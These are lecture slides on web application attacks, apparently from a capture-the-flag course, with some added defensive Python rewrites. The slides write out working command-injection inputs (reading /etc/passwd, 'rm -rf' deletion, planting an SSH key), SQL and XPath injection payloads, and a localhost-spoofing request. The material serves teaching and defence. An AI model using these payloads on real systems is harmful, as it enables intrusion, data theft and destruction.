
Mike Gerschefske. Hacking is illegal (most of the time). Understand the laws. Port scanning can be considered illegal. Post-9/11 it can be treated as an act of terrorism.


1 Mike Gerschefske

2 Hacking is illegal (most of the time)
  - Understand the laws
  - Port scanning can be considered illegal
  - Post-9/11 it can be treated as an act of terrorism
  - DMCA exceptions
    - Educational learning (institution)

3 Who cares about web hacking?
  - The days of buffer overflows and root boxes are nearing an end…
    - Non-executing stacks
    - People patching their systems
  - Everything is turning into a web system

4 Power of Google
  - Google knows all
    - SSNs/credit card numbers, backend SQL
    - http://johnny.ihackstuff.com/ghdb.php
    - intitle:snc-rz30 inurl:home/
  - robots.txt
    - Don't put secrets in here

5 Power of the web browser
  - Is capable of HTTP GET/POST
  - Capable of sending any kind of GET/POST
  - Doesn't have to run client-side code (i.e. JavaScript)
  - Can send anything it wants to
  - Can be bad:
    - URL: http://somesite/index.php?section=Admin
    - Vertical escalation

6 Bad Code = Bad Security
  - You are not able to control the client end:
    - Cookies
      - Do not put the user level (admin, user, etc.) in them: vertical escalation
      - Do not put the user id in them: horizontal escalation
    - POSTs
    - GETs
    - Session IDs
    - All data

7 The Infamous Museum Example! Command Injection
  - Tools
    - vi
    - PuTTY
    - PuTTYgen
    - Firefox

8 Museum Example
  - Code from two [n] years ago:

    #!/usr/bin/perl
    use CGI qw(param);   # param() comes from the CGI module (assumed; elided on the slide)
    …
    $first = param('first');
    $last = param('last');
    $password = param('password');
    …
    # '!' binds tighter than 'eq', so the last clause is (!$password) eq "unbreakable",
    # which is never true: the password is effectively not checked at all.
    if (($first eq "") || ($last eq "") || (! $password eq "unbreakable")) {
        print " Could not understand or wrong password!! ";
    }
    else {
        # $first and $last reach the shell unfiltered: path and shell metacharacters
        # ("..", "/", "&", ";") pass straight through. This is the command injection.
        system "cat ./museum_ideas/${first}.${last}";
    …

9 Some Good Combinations
  - Dump the password file:
    - First name: .
    - Last name: /../../../../etc/passwd
    - Password: unbreakable
  - Delete the whole directory:
    - First name: NOTEMPTY
    - Last name: & rm -rf /home/museum/public_html/cgi_bin/museum_ideas
    - Password: unbreakable

10 SSH RSA Example
  - PuTTYgen
  - & mkdir /home/museum/.ssh
  - & echo "ssh-rsa PRIV-KEY" > /home/museum/.ssh/authorized_keys2
  - NO SPACES!

11 Museum on Athena!
  - An example write-up: http://athena.uccs.edu/ictf/index.php/Museum

12 Command Injection
  - This is the basic idea of command injection
  - Security through obscurity sometimes works
  - Some people are very diligent
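A defensive rewrite of the museum script's input handling, added here as an example in Python rather than the presentation's Perl (it is not code from the original slides): names are checked against a strict allowlist, the file is read directly instead of through `system "cat ..."`, and the resolved path is confined to the ideas directory. The directory, the file contents and the function names are constructed for the example.

```python
import re
import tempfile
from pathlib import Path

# Allowlist: letters, digits, hyphen, underscore, 1-32 chars. Everything a shell
# or a path would interpret (".", "/", "&", ";", spaces) is rejected outright.
_NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,32}$")

def read_idea(ideas_dir, first, last, password, expected_password="unbreakable"):
    """Return the contents of <ideas_dir>/<first>.<last>, or None if any check fails.

    Same inputs and file naming as the museum script, but no shell is involved
    and the inputs cannot name a file outside ideas_dir.
    """
    if password != expected_password:
        return None
    if not (_NAME_RE.match(first) and _NAME_RE.match(last)):
        return None
    base = Path(ideas_dir).resolve()
    target = (base / f"{first}.{last}").resolve()
    if target.parent != base:          # defence in depth behind the allowlist
        return None
    try:
        return target.read_text()      # plain file read, no system("cat ...")
    except FileNotFoundError:
        return None

def demo():
    """Constructed sample: one idea file in a throwaway directory, then a legitimate
    request and the two inputs from the 'Some Good Combinations' slide."""
    with tempfile.TemporaryDirectory() as d:
        (Path(d) / "alice.smith").write_text("a bigger dinosaur hall\n")
        return {
            "legit": read_idea(d, "alice", "smith", "unbreakable"),
            "wrong_password": read_idea(d, "alice", "smith", "guess"),
            "traversal": read_idea(d, ".", "/../../../../etc/passwd", "unbreakable"),
            "shell": read_idea(d, "NOTEMPTY",
                               "& rm -rf /home/museum/public_html/cgi_bin/museum_ideas",
                               "unbreakable"),
        }
```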

13 SQL Injections
  - We can send commands, why not SQL?
  - What is SQL?
  - What can we do with SQL?
    - Get any data we want (that the user has access to)
    - Delete all the data the user has access to
    - If the user is root, dump the database
    - If the user is root, can upload and execute Java/C from the database and root the box

14 Another Example
  - http://128.198.60.73/~contribute/cgi-bin/history.py
  - query = "SELECT * FROM contributors where name=\"%s\" ;" % ( form.getvalue("name") )
  - Input: " or "1" = "1

15 How to protect against it?
  - Check parameters
    - Not really…
  - Need to do SQL parameterization whenever at all possible
    - Mark strings as strings, ints as ints: SELECT * WHERE name = @

16 Why doesn't checking params work?
  - If you're really smart it will, but if you don't understand the problem it won't
  - This is a very difficult problem to understand
  - Example: http://viva/ictf/index.php/SQL_Injection
    - The problem is that the ' (apostrophe) is a special character
    - To fix it we just find and replace all apostrophes with two '' as that's how we insert apostrophes in a string
    - NO!

17 Second Level SQL Injection
  - The problem actually isn't solved, just more complicated
  - Take: Username = ' OR 'a' = 'a
    SELECT * FROM Users WHERE UserName = ''' OR ''a'' = ''a''

18 Goes in fine but coming out…
  - Get the username from the DB and put it in a var
  - Var contains SQL
  - We TRUST the DB to give us good data
  - Create another SQL query and the second one is now vulnerable
    SELECT content FROM database WHERE username = VUNSQL
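The second-level case from slides 15 to 18, as an added example (Python with sqlite3, not code from the presentation): the apostrophe-doubling fix lets the username go in fine, but what comes back out of the database is the original string again, so a second query built by string formatting is injectable while the same query with a bound parameter is not. Table names and sample rows are constructed.

```python
import sqlite3

USERNAME = "' OR 'a' = 'a"   # the username from the slide

def setup():
    """Constructed sample DB: one existing note plus the new user's note."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT)")
    db.execute("CREATE TABLE notes (username TEXT, content TEXT)")
    db.execute("INSERT INTO notes VALUES ('bob', 'bob private note')")
    db.execute("INSERT INTO notes VALUES (?, ?)", (USERNAME, "new user note"))
    # First level: the "double every apostrophe" fix. The INSERT goes in fine,
    # and SQL stores the literal with the doubling undone.
    escaped = USERNAME.replace("'", "''")
    db.execute("INSERT INTO users VALUES ('" + escaped + "')")
    return db

def stored_username(db):
    """Read the username back: it is the original string, SQL and all."""
    return db.execute("SELECT username FROM users").fetchone()[0]

def notes_via_string_format(db):
    """Second query built by string formatting from trusted-looking DB data;
    this is the query the slide labels VUNSQL. Returns every note."""
    name = stored_username(db)
    return db.execute("SELECT content FROM notes WHERE username = '%s'" % name).fetchall()

def notes_via_parameters(db):
    """Same query with a bound parameter: the string is data, never SQL."""
    name = stored_username(db)
    return db.execute("SELECT content FROM notes WHERE username = ?", (name,)).fetchall()
```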

19 XSS – Cross Site Scripting
  - Malicious injection of JavaScript
  - Cookie hijacking
  - MySpace: replicate itself, add friends
    - Samy – oh wait, some CSRF too (oops)
    - http://web.archive.org/web/20060208182348/namb.la/popular/tech.html
  - document.write("<img src=http://site.com/a.jpg");

20 CSRF – Cross Site Request Forgery
  - Alice logs into www.bank.com on tab A
  - Alice goes to www.google.com, which has an advertisement that contains JS
  - Code on the ad: doc.write(" ");

21 XPath Injection
  - //user[name/text() = '' or 1=1 or '' and password/text() = 'junk']
  - Used with:
    - XML-RPC
    - SOAP/WSDL

22 Click Jacking…

23 IDS Will Find You
  - SQL/command injection is very easy to detect
  - IDS is poor at packet fragmentation with timing attacks

24 Profiling
  - Need to know what you're attacking
  - Can search for exploits
  - HEAD / HTTP/1.0 example
    - Everyone's a little different
  - Nmap is a good profiler
  - Nessus will profile too

25 Tools
  - Add N Edit Cookies – Mozilla Firefox extension
  - Wget
  - TamperData – Firefox
  - Modify Headers – Firefox
  - Curl
  - Netcat/Telnet
  - Proxies
    - Paros Proxy – free
    - Fiddler – Microsoft, free
    - Spike – free

26 Timing Attacks
  - Breaking authentication
    - Username and password wrong may take x time while username doesn't exist takes y time
  - Successful timing attacks against encryption

27 Never ever ever roll your own encryption
  - Microsoft tried this – FAIL
  - Tea Party!
  - ROT13
  - Base64
  - MD5

28 ASP.NET Exploit
  - Debugging (source code) only available to localhost
  - Bypass this check by sending the following:
    GET http://localhost/bleh.asp?a=j HTTP/1.0
  - Checks the server name variable rather than the remote address
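The server-name check the slide describes beside the corrected one, as an added Python example (not code from the presentation or from ASP.NET). It assumes CGI-style `SERVER_NAME` and `REMOTE_ADDR` variables and uses constructed request environments; the function names are hypothetical.

```python
import ipaddress

# Addresses that really mean "this host": loopback for IPv4 and IPv6
LOOPBACK = (ipaddress.ip_network("127.0.0.0/8"), ipaddress.ip_network("::1/128"))

def debug_allowed_by_server_name(environ):
    """The flawed check: the server name is derived from the request (an
    absolute-URI request line or the Host header), so the client chooses it."""
    return environ.get("SERVER_NAME", "").lower() == "localhost"

def debug_allowed_by_remote_addr(environ):
    """Corrected check: the peer address of the TCP connection is filled in by
    the server, not the client. Assumption: no reverse proxy in front; behind
    one, REMOTE_ADDR is the proxy and the restriction belongs at the proxy."""
    try:
        addr = ipaddress.ip_address(environ.get("REMOTE_ADDR", ""))
    except ValueError:
        return False
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped          # ::ffff:127.0.0.1 counts as 127.0.0.1
    return any(addr in net for net in LOOPBACK)

# Constructed CGI-style environments: the slide's request sent from a remote
# client, and a genuinely local request.
REMOTE_CLIENT = {"SERVER_NAME": "localhost", "REMOTE_ADDR": "203.0.113.7",
                 "REQUEST_URI": "http://localhost/bleh.asp?a=j"}
LOCAL_CLIENT = {"SERVER_NAME": "localhost", "REMOTE_ADDR": "127.0.0.1",
                "REQUEST_URI": "/bleh.asp?a=j"}
```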

29 mod_security
  - http://www.modsecurity.org/

30 Replay Attacks
  - Scorebot deletes flag
  - Scorebot adds flag
  - Since the scorebot goes to everyone, we have the delete and add sequence
  - Can potentially replay the same delete sequence across all enemy servers

31 Log Evasion
  - Many logs only log ~4K of URL
  - Usually don't log POST contents
    - Prevents DoS from filling up logs
  - If the payload is at the end of the 4K, the malicious payload won't be logged
    - http://somewhre.com/page.asp?foo=....&payload=MYPAYLOAD
    - Application ignores the foo parameter
    - Log shows up as GET /page.asp …
  - Not just IIS: Sun ONE App Server too
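A log review that looks for the two signs of this evasion, as an added Python example (not from the presentation): a request whose logged URL sits exactly at the logger's limit, so its tail was never recorded, and a long single-character filler parameter pushing later parameters toward that limit. The log lines, the 4096-byte limit and the function name are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

LOG_LIMIT = 4096      # ~4K of URL kept by many log configurations (per the slide)
FILLER_MIN = 1024     # a single parameter value this long deserves a look

# Common/combined log format; only the client and the request target are used
_LINE_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>[^"\s]+)')

def review_request_log(lines, limit=LOG_LIMIT, filler_min=FILLER_MIN):
    """Return (client, target prefix, reason) for each suspicious logged request."""
    findings = []
    for line in lines:
        m = _LINE_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        reason = None
        if len(target) >= limit:
            reason = "url at log limit: tail not logged"
        else:
            for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
                if len(value) >= filler_min and len(set(value)) == 1:
                    reason = f"filler parameter {key!r} ({len(value)} bytes)"
                    break
        if reason:
            findings.append((m.group("client"), target[:40], reason))
    return findings

# Constructed sample: a normal request, the slide's padded request as a truncating
# logger would store it (cut at the limit), and a padded request that fit the limit.
_PADDED = "/page.asp?foo=" + "." * 5000 + "&payload=MYPAYLOAD"
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2008:13:55:36 -0700] "GET /page.asp?foo=bar HTTP/1.0" 200 512',
    '203.0.113.7 - - [10/Oct/2008:13:55:40 -0700] "GET ' + _PADDED[:LOG_LIMIT] + '" 200 512',
    '198.51.100.2 - - [10/Oct/2008:13:55:41 -0700] "POST /page.asp?foo=' + "x" * 2000 + ' HTTP/1.0" 200 512',
]
```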

32 OWASP – Top 10!
  - A1 - Cross Site Scripting (XSS)
  - A2 - Injection Flaws
  - A3 - Malicious File Execution
  - A4 - Insecure Direct Object Reference
  - A5 - Cross Site Request Forgery (CSRF)
  - A6 - Information Leakage and Improper Error Handling
  - A7 - Broken Authentication and Session Management
  - A8 - Insecure Cryptographic Storage
  - A9 - Insecure Communications
  - A10 - Failure to Restrict URL Access

